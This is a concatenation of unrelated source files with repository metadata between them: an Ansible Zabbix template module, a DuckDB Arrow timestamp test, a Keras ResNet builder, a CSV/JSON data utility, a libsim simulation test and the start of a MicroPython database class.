found. template_json - JSON structures are compared as deep sorted dictionaries, template_xml - XML structures are compared as strings, but filtered and formatted first, If none above is used, all the other arguments are compared to their existing counterparts retrieved from Zabbix API.""" changed = False # Compare filtered and formatted XMLs strings for any changes. It is expected that provided # XML has same structure as Zabbix uses (e.g. it was optimally exported via Zabbix GUI or API) if template_content is not None and template_type == 'xml': existing_template = self.dump_template(template_ids, template_type='xml') if self.filter_xml_template(template_content) != self.filter_xml_template(existing_template): changed = True return changed existing_template = self.dump_template(template_ids, template_type='json') # Compare JSON objects as deep sorted python dictionaries if template_content is not None and template_type == 'json': parsed_template_json = self.load_json_template(template_content) if self.diff_template(parsed_template_json, existing_template): changed = True return changed # If neither template_json or template_xml were used, user provided all parameters via module options if template_groups is not None: existing_groups = [g['name'] for g in existing_template['zabbix_export']['groups']] if set(template_groups) != set(existing_groups): changed = True if 'templates' not in existing_template['zabbix_export']['templates'][0]: existing_template['zabbix_export']['templates'][0]['templates'] = [] # Check if any new templates would be linked or any existing would be unlinked exist_child_templates = [t['name'] for t in existing_template['zabbix_export']['templates'][0]['templates']] if link_templates is not None: if set(link_templates) != set(exist_child_templates): changed = True else: if set([]) != set(exist_child_templates): changed = True # Mark that there will be changes when at least one existing template will be unlinked if clear_templates is not None: for t in clear_templates: if t in exist_child_templates: changed = True break if 'macros' not in existing_template['zabbix_export']['templates'][0]: existing_template['zabbix_export']['templates'][0]['macros'] = [] if template_macros is not None: existing_macros = existing_template['zabbix_export']['templates'][0]['macros'] if template_macros != existing_macros: changed = True return changed def update_template(self, template_ids, group_ids, link_template_ids, clear_template_ids, template_macros): template_changes = {} if group_ids is not None: template_changes.update({'groups': group_ids}) if link_template_ids is not None: template_changes.update({'templates': link_template_ids}) else: template_changes.update({'templates': []}) if clear_template_ids is not None: template_changes.update({'templates_clear': clear_template_ids}) if template_macros is not None: template_changes.update({'macros': template_macros}) if template_changes: # If we got here we know that only one template was provided via template_name template_changes.update({'templateid': template_ids[0]}) self._zapi.template.update(template_changes) def delete_template(self, templateids): if self._module.check_mode: self._module.exit_json(changed=True) self._zapi.template.delete(templateids) def ordered_json(self, obj): # Deep sort json dicts for comparison if isinstance(obj, dict): return sorted((k, self.ordered_json(v)) for k, v in obj.items()) if isinstance(obj, list): return sorted(self.ordered_json(x) for x in obj) else: return obj def dump_template(self, template_ids, template_type='json', omit_date=False): if self._module.check_mode: self._module.exit_json(changed=True) try: dump = self._zapi.configuration.export({'format': template_type, 'options': {'templates': template_ids}}) if template_type == 'xml': xmlroot = ET.fromstring(dump.encode('utf-8')) # remove date field if requested if omit_date: date = xmlroot.find(".date") if date is not None: xmlroot.remove(date) return str(ET.tostring(xmlroot, encoding='utf-8').decode('utf-8')) else: return self.load_json_template(dump, omit_date=omit_date) except ZabbixAPIException as e: self._module.fail_json(msg='Unable to export template: %s' % e) def diff_template(self, template_json_a, template_json_b): # Compare 2 zabbix templates and return True if they differ. template_json_a = self.filter_template(template_json_a) template_json_b = self.filter_template(template_json_b) if self.ordered_json(template_json_a) == self.ordered_json(template_json_b): return False return True def filter_template(self, template_json): # Filter the template json to contain only the keys we will update keep_keys = set(['graphs', 'templates', 'triggers', 'value_maps']) unwanted_keys = set(template_json['zabbix_export']) - keep_keys for unwanted_key in unwanted_keys: del template_json['zabbix_export'][unwanted_key] # Versions older than 2.4 do not support description field within template desc_not_supported = False if LooseVersion(self._zapi.api_version()).version[:2] < LooseVersion('2.4').version: desc_not_supported = True # Filter empty attributes from template object to allow accurate comparison for template in template_json['zabbix_export']['templates']: for key in list(template.keys()): if not template[key] or (key == 'description' and desc_not_supported): template.pop(key) return template_json def filter_xml_template(self, template_xml): """Filters out keys from XML template that may wary between exports (e.g date or version) and keys that are not imported via this module. It is advised that provided XML template exactly matches XML structure used by Zabbix""" # Strip last new line and convert string to ElementTree parsed_xml_root = self.load_xml_template(template_xml.strip()) keep_keys = ['graphs', 'templates', 'triggers', 'value_maps'] # Remove unwanted XML nodes for node in list(parsed_xml_root): if node.tag not in keep_keys: parsed_xml_root.remove(node) # Filter empty attributes from template objects to allow accurate comparison for template in list(parsed_xml_root.find('templates')): for element in list(template): if element.text is None and len(list(element)) == 0: template.remove(element) # Filter new lines and indentation xml_root_text = list(line.strip() for line in ET.tostring(parsed_xml_root, encoding='utf8', method='xml').decode().split('\n')) return ''.join(xml_root_text) def load_json_template(self, template_json, omit_date=False): try: jsondoc = json.loads(template_json) if omit_date and 'date' in jsondoc['zabbix_export']: del jsondoc['zabbix_export']['date'] return jsondoc except ValueError as e: self._module.fail_json(msg='Invalid JSON provided', details=to_native(e), exception=traceback.format_exc()) def load_xml_template(self, template_xml): try: return ET.fromstring(template_xml) except ET.ParseError as e: self._module.fail_json(msg='Invalid XML provided', details=to_native(e), exception=traceback.format_exc()) def import_template(self, template_content, template_type='json'): # rules schema latest version update_rules = { 'applications': { 'createMissing': True, 'deleteMissing': True }, 'discoveryRules': { 'createMissing': True, 'updateExisting': True, 'deleteMissing': True }, 'graphs': { 'createMissing': True, 'updateExisting': True, 'deleteMissing': True }, 'groups': { 'createMissing': True }, 'httptests': { 'createMissing': True, 'updateExisting': True, 'deleteMissing': True }, 'items': { 'createMissing': True, 'updateExisting': True, 'deleteMissing': True }, 'templates': { 'createMissing': True, 'updateExisting': True }, 'templateLinkage': { 'createMissing': True }, 'templateScreens': { 'createMissing': True, 'updateExisting': True, 'deleteMissing': True }, 'triggers': { 'createMissing': True, 'updateExisting': True, 'deleteMissing': True }, 'valueMaps': { 'createMissing': True, 'updateExisting': True } } try: # old api version support here api_version = self._zapi.api_version() # updateExisting for application removed from zabbix api after 3.2 if LooseVersion(api_version).version[:2] <= LooseVersion('3.2').version: update_rules['applications']['updateExisting'] = True # templateLinkage.deleteMissing only available in 4.0 branch higher .16 and higher 4.4.4 # it's not available in 4.2 branches or lower 4.0.16 if LooseVersion(api_version).version[:2] == LooseVersion('4.0').version and \ LooseVersion(api_version).version[:3] >= LooseVersion('4.0.16').version: update_rules['templateLinkage']['deleteMissing'] = True if LooseVersion(api_version).version[:3] >= LooseVersion('4.4.4').version: update_rules['templateLinkage']['deleteMissing'] = True import_data = {'format': template_type, 'source': template_content, 'rules': update_rules} self._zapi.configuration.import_(import_data) except ZabbixAPIException as e: self._module.fail_json(msg='Unable to import template', details=to_native(e), exception=traceback.format_exc()) def main(): module = AnsibleModule( argument_spec=dict( server_url=dict(type='str', required=True, aliases=['url']), login_user=dict(type='str', required=True), login_password=dict(type='str', required=True, no_log=True), http_login_user=dict(type='str', required=False, default=None), http_login_password=dict(type='str', required=False, default=None, no_log=True), validate_certs=dict(type='bool', required=False, default=True), template_name=dict(type='str', required=False), template_json=dict(type='json', required=False), template_xml=dict(type='str', required=False), template_groups=dict(type='list', required=False), link_templates=dict(type='list', required=False), clear_templates=dict(type='list', required=False), macros=dict(type='list', required=False), omit_date=dict(type='bool', required=False, default=False), dump_format=dict(type='str', required=False, default='json', choices=['json', 'xml']), state=dict(type='str', default="present", choices=['present', 'absent', 'dump']), timeout=dict(type='int', default=10) ), required_one_of=[ ['template_name', 'template_json', 'template_xml'] ], mutually_exclusive=[ ['template_name', 'template_json', 'template_xml'] ], required_if=[ ['state', 'absent', ['template_name']], ['state', 'dump', ['template_name']] ], supports_check_mode=True ) if not HAS_ZABBIX_API: module.fail_json(msg=missing_required_lib('zabbix-api', url='https://pypi.org/project/zabbix-api/'), exception=ZBX_IMP_ERR) server_url = module.params['server_url'] login_user = module.params['login_user'] login_password = module.params['login_password'] http_login_user = module.params['http_login_user'] http_login_password = module.params['http_login_password'] validate_certs = module.params['validate_certs'] template_name = module.params['template_name'] template_json = module.params['template_json'] template_xml = module.params['template_xml'] template_groups = module.params['template_groups'] link_templates = module.params['link_templates'] clear_templates = module.params['clear_templates'] template_macros = module.params['macros'] omit_date = module.params['omit_date'] dump_format = module.params['dump_format'] state = module.params['state'] timeout = module.params['timeout'] zbx = None try: zbx = ZabbixAPI(server_url, timeout=timeout, user=http_login_user, passwd=http_login_password, validate_certs=validate_certs) zbx.login(login_user, login_password) atexit.register(zbx.logout) except ZabbixAPIException as e: module.fail_json(msg="Failed to connect to Zabbix server: %s" % e) template = Template(module, zbx) # Identify template names for IDs retrieval # Template names are expected to reside in ['zabbix_export']['templates'][*]['template'] for both data types template_content, template_type = None, None if template_json is not None: template_type = 'json' template_content = template_json json_parsed = template.load_json_template(template_content) template_names = list(t['template'] for t in json_parsed['zabbix_export']['templates']) elif template_xml is not None: template_type = 'xml' template_content = template_xml xml_parsed = template.load_xml_template(template_content) template_names = list(t.find('template').text for t in list(xml_parsed.find('templates'))) else: template_names = [template_name] template_ids = template.get_template_ids(template_names) if state == "absent": if not template_ids: module.exit_json(changed=False, msg="Template not found. No changed: %s" % template_name) template.delete_template(template_ids) module.exit_json(changed=True, result="Successfully deleted template %s" % template_name) elif state == "dump": module.deprecate("The 'dump' state has been deprecated and will be removed, use 'zabbix_template_info' module instead.", version='2.14') if not template_ids: module.fail_json(msg='Template not found: %s' % template_name) if dump_format == 'json': module.exit_json(changed=False, template_json=template.dump_template(template_ids, template_type='json', omit_date=omit_date)) elif dump_format == 'xml': module.exit_json(changed=False, template_xml=template.dump_template(template_ids, template_type='xml', omit_date=omit_date)) elif state == "present": # Load all subelements for template that were provided by user group_ids = None if template_groups is not None: group_ids = template.get_group_ids_by_group_names(template_groups) link_template_ids = None if link_templates is not None: link_template_ids = template.get_template_ids(link_templates) clear_template_ids = None if clear_templates is not None: clear_template_ids = template.get_template_ids(clear_templates) if template_macros is not None: # Zabbix configuration.export does not differentiate python types (numbers are returned as strings) for macroitem in template_macros: for key in macroitem: macroitem[key] = str(macroitem[key]) if not template_ids: # Assume new templates are being added when no ID's were found if template_content is not None: template.import_template(template_content, template_type) module.exit_json(changed=True, result="Template import successful") else: if group_ids is None: module.fail_json(msg='template_groups are required when creating a new Zabbix template') template.add_template(template_name, group_ids, link_template_ids, template_macros) module.exit_json(changed=True, result="Successfully added template: %s" % template_name) else: changed = template.check_template_changed(template_ids, template_groups, link_templates, clear_templates, template_macros, template_content, template_type) if module.check_mode: module.exit_json(changed=changed) if changed: if template_type is not None: template.import_template(template_content, template_type) else: template.update_template(template_ids, group_ids, link_template_ids, clear_template_ids, template_macros) module.exit_json(changed=changed, result="Template successfully updated") if __name__ == '__main__': main()
38.557789
144
0.615893
9c18f8315105f2144d7afb8563f73d992aff655e
2,648
py
Python
tools/pythonpkg/tests/fast/arrow/test_timestamps.py
AldoMyrtaj/duckdb
3aa4978a2ceab8df25e4b20c388bcd7629de73ed
[ "MIT" ]
2,816
2018-06-26T18:52:52.000Z
2021-04-06T10:39:15.000Z
tools/pythonpkg/tests/fast/arrow/test_timestamps.py
AldoMyrtaj/duckdb
3aa4978a2ceab8df25e4b20c388bcd7629de73ed
[ "MIT" ]
1,310
2021-04-06T16:04:52.000Z
2022-03-31T13:52:53.000Z
tools/pythonpkg/tests/fast/arrow/test_timestamps.py
AldoMyrtaj/duckdb
3aa4978a2ceab8df25e4b20c388bcd7629de73ed
[ "MIT" ]
270
2021-04-09T06:18:28.000Z
2022-03-31T11:55:37.000Z
import duckdb import os import datetime import pytest try: import pyarrow as pa import pandas as pd can_run = True except: can_run = False class TestArrowTimestamps(object): def test_timestamp_types(self, duckdb_cursor): if not can_run: return data = (pa.array([datetime.datetime.now()], type=pa.timestamp('ns')),pa.array([datetime.datetime.now()], type=pa.timestamp('us')),pa.array([datetime.datetime.now()], pa.timestamp('ms')),pa.array([datetime.datetime.now()], pa.timestamp('s'))) arrow_table = pa.Table.from_arrays([data[0],data[1],data[2],data[3]],['a','b','c','d']) rel = duckdb.from_arrow_table(arrow_table).arrow() assert (rel['a'] == arrow_table['a']) assert (rel['b'] == arrow_table['b']) assert (rel['c'] == arrow_table['c']) assert (rel['d'] == arrow_table['d']) def test_timestamp_nulls(self, duckdb_cursor): if not can_run: return data = (pa.array([None], type=pa.timestamp('ns')),pa.array([None], type=pa.timestamp('us')),pa.array([None], pa.timestamp('ms')),pa.array([None], pa.timestamp('s'))) arrow_table = pa.Table.from_arrays([data[0],data[1],data[2],data[3]],['a','b','c','d']) rel = duckdb.from_arrow_table(arrow_table).arrow() assert (rel['a'] == arrow_table['a']) assert (rel['b'] == arrow_table['b']) assert (rel['c'] == arrow_table['c']) assert (rel['d'] == arrow_table['d']) def test_timestamp_overflow(self, duckdb_cursor): if not can_run: return data = (pa.array([9223372036854775807], pa.timestamp('s')),pa.array([9223372036854775807], pa.timestamp('ms')),pa.array([9223372036854775807], pa.timestamp('us'))) arrow_table = pa.Table.from_arrays([data[0],data[1],data[2]],['a','b','c']) arrow_from_duck = duckdb.from_arrow_table(arrow_table).arrow() assert (arrow_from_duck['a'] == arrow_table['a']) assert (arrow_from_duck['b'] == arrow_table['b']) assert (arrow_from_duck['c'] == arrow_table['c']) with pytest.raises(Exception): duck_rel = duckdb.from_arrow_table(arrow_table) res = duck_rel.project('a::TIMESTAMP_US') res.fetchone() with pytest.raises(Exception): duck_rel = duckdb.from_arrow_table(arrow_table) res = duck_rel.project('b::TIMESTAMP_US') res.fetchone() with pytest.raises(Exception): duck_rel = duckdb.from_arrow_table(arrow_table) res = duck_rel.project('c::TIMESTAMP_NS') res.fetchone()
43.409836
249
0.604985
9c343a573df4394fcd53c5e1037b636600240360
13,378
py
Python
CodeAnalyzing/resnet.py
gian1312/suchen
df863140fd8df1ac2e195cbdfa4756f09f962270
[ "Apache-2.0" ]
null
null
null
CodeAnalyzing/resnet.py
gian1312/suchen
df863140fd8df1ac2e195cbdfa4756f09f962270
[ "Apache-2.0" ]
null
null
null
CodeAnalyzing/resnet.py
gian1312/suchen
df863140fd8df1ac2e195cbdfa4756f09f962270
[ "Apache-2.0" ]
1
2019-11-29T12:28:33.000Z
2019-11-29T12:28:33.000Z
#!/usr/bin/env python #taken from https://github.com/raghakot/keras-resnet/blob/master/resnet.py from __future__ import division import six from keras.models import Model from keras.layers import ( Input, Activation, Dense, Flatten ) from keras.layers.core import Lambda from keras.layers.merge import (dot, concatenate) from keras.layers.convolutional import ( Conv2D, MaxPooling2D, AveragePooling2D ) from keras.layers.merge import add from keras.layers.normalization import BatchNormalization from keras.regularizers import l2 from keras import backend as K NUM_EMBEDDING = 512 #256 #512 #1024 #256 #1024 #256 TOP_HIDDEN = 4 #1 #4 NORMALIZATION_ON = False #True #False #True def _bn_relu(input): """Helper to build a BN -> relu block """ norm = BatchNormalization(axis=CHANNEL_AXIS)(input) return Activation("relu")(norm) def _conv_bn_relu(**conv_params): """Helper to build a conv -> BN -> relu block """ filters = conv_params["filters"] kernel_size = conv_params["kernel_size"] strides = conv_params.setdefault("strides", (1, 1)) kernel_initializer = conv_params.setdefault("kernel_initializer", "he_normal") padding = conv_params.setdefault("padding", "same") kernel_regularizer = conv_params.setdefault("kernel_regularizer", l2(1.e-4)) def f(input): conv = Conv2D(filters=filters, kernel_size=kernel_size, strides=strides, padding=padding, kernel_initializer=kernel_initializer, kernel_regularizer=kernel_regularizer)(input) return _bn_relu(conv) return f def _bn_relu_conv(**conv_params): """Helper to build a BN -> relu -> conv block. This is an improved scheme proposed in http://arxiv.org/pdf/1603.05027v2.pdf """ filters = conv_params["filters"] kernel_size = conv_params["kernel_size"] strides = conv_params.setdefault("strides", (1, 1)) kernel_initializer = conv_params.setdefault("kernel_initializer", "he_normal") padding = conv_params.setdefault("padding", "same") kernel_regularizer = conv_params.setdefault("kernel_regularizer", l2(1.e-4)) def f(input): activation = _bn_relu(input) return Conv2D(filters=filters, kernel_size=kernel_size, strides=strides, padding=padding, kernel_initializer=kernel_initializer, kernel_regularizer=kernel_regularizer)(activation) return f def _shortcut(input, residual): """Adds a shortcut between input and residual block and merges them with "sum" """ # Expand channels of shortcut to match residual. # Stride appropriately to match residual (width, height) # Should be int if network architecture is correctly configured. input_shape = K.int_shape(input) residual_shape = K.int_shape(residual) stride_width = int(round(input_shape[ROW_AXIS] / residual_shape[ROW_AXIS])) stride_height = int(round(input_shape[COL_AXIS] / residual_shape[COL_AXIS])) equal_channels = input_shape[CHANNEL_AXIS] == residual_shape[CHANNEL_AXIS] shortcut = input # 1 X 1 conv if shape is different. Else identity. if stride_width > 1 or stride_height > 1 or not equal_channels: shortcut = Conv2D(filters=residual_shape[CHANNEL_AXIS], kernel_size=(1, 1), strides=(stride_width, stride_height), padding="valid", kernel_initializer="he_normal", kernel_regularizer=l2(0.0001))(input) return add([shortcut, residual]) def _residual_block(block_function, filters, repetitions, is_first_layer=False): """Builds a residual block with repeating bottleneck blocks. """ def f(input): for i in range(repetitions): init_strides = (1, 1) if i == 0 and not is_first_layer: init_strides = (2, 2) input = block_function(filters=filters, init_strides=init_strides, is_first_block_of_first_layer=(is_first_layer and i == 0))(input) return input return f def basic_block(filters, init_strides=(1, 1), is_first_block_of_first_layer=False): """Basic 3 X 3 convolution blocks for use on resnets with layers <= 34. Follows improved proposed scheme in http://arxiv.org/pdf/1603.05027v2.pdf """ def f(input): if is_first_block_of_first_layer: # don't repeat bn->relu since we just did bn->relu->maxpool conv1 = Conv2D(filters=filters, kernel_size=(3, 3), strides=init_strides, padding="same", kernel_initializer="he_normal", kernel_regularizer=l2(1e-4))(input) else: conv1 = _bn_relu_conv(filters=filters, kernel_size=(3, 3), strides=init_strides)(input) residual = _bn_relu_conv(filters=filters, kernel_size=(3, 3))(conv1) return _shortcut(input, residual) return f def bottleneck(filters, init_strides=(1, 1), is_first_block_of_first_layer=False): """Bottleneck architecture for > 34 layer resnet. Follows improved proposed scheme in http://arxiv.org/pdf/1603.05027v2.pdf Returns: A final conv layer of filters * 4 """ def f(input): if is_first_block_of_first_layer: # don't repeat bn->relu since we just did bn->relu->maxpool conv_1_1 = Conv2D(filters=filters, kernel_size=(1, 1), strides=init_strides, padding="same", kernel_initializer="he_normal", kernel_regularizer=l2(1e-4))(input) else: conv_1_1 = _bn_relu_conv(filters=filters, kernel_size=(3, 3), strides=init_strides)(input) conv_3_3 = _bn_relu_conv(filters=filters, kernel_size=(3, 3))(conv_1_1) residual = _bn_relu_conv(filters=filters * 4, kernel_size=(1, 1))(conv_3_3) return _shortcut(input, residual) return f def _handle_dim_ordering(): global ROW_AXIS global COL_AXIS global CHANNEL_AXIS if K.image_dim_ordering() == 'tf': ROW_AXIS = 1 COL_AXIS = 2 CHANNEL_AXIS = 3 else: CHANNEL_AXIS = 1 ROW_AXIS = 2 COL_AXIS = 3 def _get_block(identifier): if isinstance(identifier, six.string_types): res = globals().get(identifier) if not res: raise ValueError('Invalid {}'.format(identifier)) return res return identifier def _bn_relu_for_dense(input): norm = BatchNormalization(axis=1)(input) return Activation('relu')(norm) def _top_network(input): raw_result = _bn_relu_for_dense(input) for _ in xrange(TOP_HIDDEN): raw_result = Dense(units=NUM_EMBEDDING, kernel_initializer='he_normal')(raw_result) raw_result = _bn_relu_for_dense(raw_result) output = Dense(units=2, activation='softmax', kernel_initializer='he_normal')(raw_result) return output class ResnetBuilder(object): @staticmethod def build(input_shape, num_outputs, block_fn, repetitions, is_classification): """Builds a custom ResNet like architecture. Args: input_shape: The input shape in the form (nb_channels, nb_rows, nb_cols) num_outputs: The number of outputs at final softmax layer block_fn: The block function to use. This is either `basic_block` or `bottleneck`. The original paper used basic_block for layers < 50 repetitions: Number of repetitions of various block units. At each block unit, the number of filters are doubled and the input size is halved Returns: The keras `Model`. """ _handle_dim_ordering() if len(input_shape) != 3: raise Exception("Input shape should be a tuple (nb_channels, nb_rows, nb_cols)") # Permute dimension order if necessary if K.image_dim_ordering() == 'tf': input_shape = (input_shape[1], input_shape[2], input_shape[0]) # Load function from str if needed. block_fn = _get_block(block_fn) input = Input(shape=input_shape) conv1 = _conv_bn_relu(filters=64, kernel_size=(7, 7), strides=(2, 2))(input) pool1 = MaxPooling2D(pool_size=(3, 3), strides=(2, 2), padding="same")(conv1) block = pool1 filters = 64 for i, r in enumerate(repetitions): block = _residual_block(block_fn, filters=filters, repetitions=r, is_first_layer=(i == 0))(block) filters *= 2 # Last activation block = _bn_relu(block) # Classifier block block_shape = K.int_shape(block) pool2 = AveragePooling2D(pool_size=(block_shape[ROW_AXIS], block_shape[COL_AXIS]), strides=(1, 1))(block) flatten1 = Flatten()(pool2) last_activation = None if is_classification: last_activation = "softmax" dense = Dense(units=num_outputs, kernel_initializer="he_normal", activation=last_activation)(flatten1) model = Model(inputs=input, outputs=dense) return model @staticmethod def build_resnet_18(input_shape, num_outputs, is_classification=True): return ResnetBuilder.build(input_shape, num_outputs, basic_block, [2, 2, 2, 2], is_classification) @staticmethod def build_resnet_34(input_shape, num_outputs): return ResnetBuilder.build(input_shape, num_outputs, basic_block, [3, 4, 6, 3]) @staticmethod def build_resnet_50(input_shape, num_outputs): return ResnetBuilder.build(input_shape, num_outputs, bottleneck, [3, 4, 6, 3]) @staticmethod def build_resnet_101(input_shape, num_outputs): return ResnetBuilder.build(input_shape, num_outputs, bottleneck, [3, 4, 23, 3]) @staticmethod def build_resnet_152(input_shape, num_outputs): return ResnetBuilder.build(input_shape, num_outputs, bottleneck, [3, 8, 36, 3]) @staticmethod def build_top_network(edge_model): number_of_top_layers = 3 + TOP_HIDDEN * 3 input = Input(shape=(2 * NUM_EMBEDDING,)) output = edge_model.layers[-number_of_top_layers](input) #_top_network(input) for index in xrange(-number_of_top_layers + 1, 0): output = edge_model.layers[index](output) return Model(inputs=input, outputs=output) @staticmethod def build_bottom_network(edge_model, input_shape): channels, height, width = input_shape input = Input(shape=(height, width, channels)) branch = edge_model.layers[3] output = branch(input) if NORMALIZATION_ON: output = Lambda(lambda x: K.l2_normalize(x, axis=1))(output) return Model(inputs=input, outputs=output) @staticmethod def build_siamese_resnet_18(input_shape, num_outputs): channels, height, width = input_shape branch_channels = 3 #channels / 2 branch_input_shape = (branch_channels, height, width) branch = ResnetBuilder.build_resnet_18(branch_input_shape, NUM_EMBEDDING, False) input = Input(shape=(height, width, channels)) first_branch = branch(Lambda(lambda x: x[:, :, :, :3])(input)) second_branch = branch(Lambda(lambda x: x[:, :, :, 3:])(input)) if NORMALIZATION_ON: first_branch = Lambda(lambda x: K.l2_normalize(x, axis=1))(first_branch) second_branch = Lambda(lambda x: K.l2_normalize(x, axis=1))(second_branch) raw_result = concatenate([first_branch, second_branch]) output = _top_network(raw_result) # raw_result = dot([first_branch, second_branch], axes=1) # result = Lambda(lambda x: (K.clip(x, 0.5, 1) - 0.5) * 2.0)(raw_result) # negated_result = Lambda(lambda x: 1 - x)(result) # output = concatenate([negated_result, result]) return Model(inputs=input, outputs=output) @staticmethod def build_pixel_comparison_network(input_shape): channels, height, width = input_shape input = Input(shape=(height, width, channels)) first = Flatten()(Lambda(lambda x: x[:, :, :, :1])(input)) second = Flatten()(Lambda(lambda x: x[:, :, :, 1:])(input)) # second = Lambda(lambda x: -x)(second) # difference = add([first, second]) # raw_result = Lambda(lambda x: K.mean(K.abs(x), axis=1, keepdims=True))(difference) # prob_zero = Lambda(lambda x: x / 255.0)(raw_result) # prob_one = Lambda(lambda x: 1.0 - x)(prob_zero) prob_one = dot([first, second], axes=1, normalize=True) prob_zero = Lambda(lambda x: 1.0 - x)(prob_one) output = concatenate([prob_zero, prob_one]) return Model(inputs=input, outputs=output)
20.362253
109
0.627897
92e714dacc8acd7270c7578f9487d0faf292923f
2,324
py
Python
dataset/utils/data_deal.py
baowj-678/TC
4c9bf6bf2202c9930616259d3f3e1a2b0529a6e6
[ "MIT" ]
null
null
null
dataset/utils/data_deal.py
baowj-678/TC
4c9bf6bf2202c9930616259d3f3e1a2b0529a6e6
[ "MIT" ]
null
null
null
dataset/utils/data_deal.py
baowj-678/TC
4c9bf6bf2202c9930616259d3f3e1a2b0529a6e6
[ "MIT" ]
null
null
null
""" @Description: 加载数据,保存数据 @Author: Bao Wenjie @Email: [email protected] @Date: 2020/10/27 """ import csv import os import json class DataDeal: def __init__(self): pass @classmethod def load_data(cls, path, delimiter='\t', encoding="utf-8-sig", quotechar=None): """ 从文件读取数据\n @param:\n :path: 路径\n :cls: 分隔符(一行内)\n :encoding: 编码方式\n :quotechar: 引用符\n @return:\n :lines: list(),读取的数据\n """ with open(path, "r", encoding=encoding) as f: reader = csv.reader(f, delimiter=delimiter, quotechar=quotechar) lines = [] for line in reader: lines.append(line) return lines @classmethod def save_data(cls, data, path, head=None, encoding='utf-8', dialect='tsv'): """ 保存多列数据到文件 [[str, ...], [str,...]] @param:\n :data: 数据 :head: 数据头 :path: 保存路径 :cls: 分隔符 :encoding: 编码方式 """ with open(path, mode='w+', encoding=encoding) as file: writer = csv.writer(file, dialect=dialect) if head is not None: writer.writerow(head) writer.writerows(data) return @classmethod def save_single(cls, data, path, encoding='utf-8'): """ 保存单列数据 [str] @param: :data: 数据 :path: 保存路径 :encoding: 编码方式 """ if not os.path.exists(os.path.dirname(path)): raise Exception("该路径不存在") with open(path, mode='w+', encoding=encoding) as file: for line in data: file.write(line) file.write('\n') print('-'*8, '写入成功', '-'*8) return @staticmethod def save_dict_json(path, dict_, encoding='utf-8'): """ 保存dict到json文件 @param: :path: (str) 保存路径 :dict_: (dict) 字典 """ # if not os.path.exists(os.path.dirname(path)): # raise Exception("路径不存在") with open(path, 'w+', encoding=encoding) as json_file: json.dump(dict_, json_file, indent=2) if __name__ == "__main__": # data = DataDeal.load_data(path='dataset/CONLL2003/test.txt', cls=' ') # print(data[:9]) data = {2:3, 4:5} DataDeal.save_dict_json(dict_=data, path='a.out')
27.666667
83
0.527108
1363bbef712d0e4f7a4dec0992a594a5b0be200d
252
py
Python
Utils/py/naoth/setup.py
tarsoly/NaoTH
dcd2b67ef6bf9953c81d3e1b26e543b5922b7d52
[ "ECL-2.0", "Apache-2.0" ]
null
null
null
Utils/py/naoth/setup.py
tarsoly/NaoTH
dcd2b67ef6bf9953c81d3e1b26e543b5922b7d52
[ "ECL-2.0", "Apache-2.0" ]
null
null
null
Utils/py/naoth/setup.py
tarsoly/NaoTH
dcd2b67ef6bf9953c81d3e1b26e543b5922b7d52
[ "ECL-2.0", "Apache-2.0" ]
null
null
null
#!/usr/bin/python from setuptools import setup setup(name='naoth', version='0.2', description='Python Utils for the NaoTH toolchain', packages=["naoth"], install_requires=[ 'protobuf', ], zip_safe=False)
19.384615
57
0.603175
bc57b27a0d51013b4cd0c8401a627b982c16ee53
1,173
py
Python
src/test/tests/simulation/domainbounds.py
visit-dav/vis
c08bc6e538ecd7d30ddc6399ec3022b9e062127e
[ "BSD-3-Clause" ]
226
2018-12-29T01:13:49.000Z
2022-03-30T19:16:31.000Z
src/test/tests/simulation/domainbounds.py
visit-dav/vis
c08bc6e538ecd7d30ddc6399ec3022b9e062127e
[ "BSD-3-Clause" ]
5,100
2019-01-14T18:19:25.000Z
2022-03-31T23:08:36.000Z
src/test/tests/simulation/domainbounds.py
visit-dav/vis
c08bc6e538ecd7d30ddc6399ec3022b9e062127e
[ "BSD-3-Clause" ]
84
2019-01-24T17:41:50.000Z
2022-03-10T10:01:46.000Z
# ---------------------------------------------------------------------------- # CLASSES: nightly # # Test Case: domainbounds.py # # Tests: libsim - connecting to simulation and retrieving data from it. # mesh - 3D rectilinear mesh # # Programmer: Kathleen Biagas # Date: June 17, 2014 # # Modifications: # # ---------------------------------------------------------------------------- # Create our simulation object. sim = TestSimulation("domainbounds", "domainbounds.sim2") # Test that we can start and connect to the simulation. started, connected = TestSimStartAndConnect("domainbounds00", sim) # Perform our tests. if connected: # Make sure the metadata is right. TestSimMetaData("domainbounds01", sim.metadata()) AddPlot("Subset", "Domains") DrawPlots() v = GetView3D() v.viewNormal = (0.672727, 0.569817, 0.471961) v.viewUp = (-0.252634, 0.776445, -0.57733) SetView3D(v) Test("domainbounds02") DeleteAllPlots() AddPlot("Pseudocolor", "zonal") DrawPlots() Test("domainbounds03") DeleteAllPlots() # Close down the simulation. if started: sim.endsim() Exit()
24.957447
78
0.57289
4c5d24570ac7916f7fdc26625fc48412aa89e4a5
18,542
py
Python
MAIN/STM32F405_C/NORMAL/V38/DataBase.py
ozturkahmetcevdet/VSenst
07c068fefcbd66ae4d8ec0480b4da10d6b5c7410
[ "MIT" ]
null
null
null
MAIN/STM32F405_C/NORMAL/V38/DataBase.py
ozturkahmetcevdet/VSenst
07c068fefcbd66ae4d8ec0480b4da10d6b5c7410
[ "MIT" ]
null
null
null
MAIN/STM32F405_C/NORMAL/V38/DataBase.py
ozturkahmetcevdet/VSenst
07c068fefcbd66ae4d8ec0480b4da10d6b5c7410
[ "MIT" ]
null
null
null
import gc from micropython import const from PXSensor import PxHub, key, T import os import peripheral import binascii import ujson as js from machine import RTC DEBUG = False OPEN_SCENE_SHOW_TIME = const(5000) CLOSING_TIME = const(10000) CLOSE_SCENE_SHOW_TIME = const(1000) class TextColour: HEADER = '\033[95m' OKBLUE = '\033[94m' OKCYAN = '\033[96m' OKGREEN = '\033[92m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' UNDERLINE = '\033[4m' HUBDB_JSON_FILE_NAME = "HUB_DB.json" COORDINATEDB_JSON_FILE_NAME = "jf/COORDINATE_DB.json" INSTRUCTIONDB_JSON_FILE_NAME = "jf/INSTRUCTION_DB.json" LANGUAGEDB_JSON_FILE_NAME = "jf/LANGUAGE_DB.json" MENUDB_JSON_FILE_NAME = "jf/MENU_DB.json" NOTIFICATIONDB_JSON_FILE_NAME = "jf/NOTIFICATION_DB.json" class DataBase(RTC): def __init__(self): self.HubList = [] self.HubJson = {} self.HubJsonIsExist = False self.CoordinateJson = {} self.CoordinateJsonIsExist = False self.CoordinateJsonRefresh = False self.InstructionJson = {} self.InstructionJsonIsExist = False self.InstructionJsonRefresh = False self.LanguageJson = {} 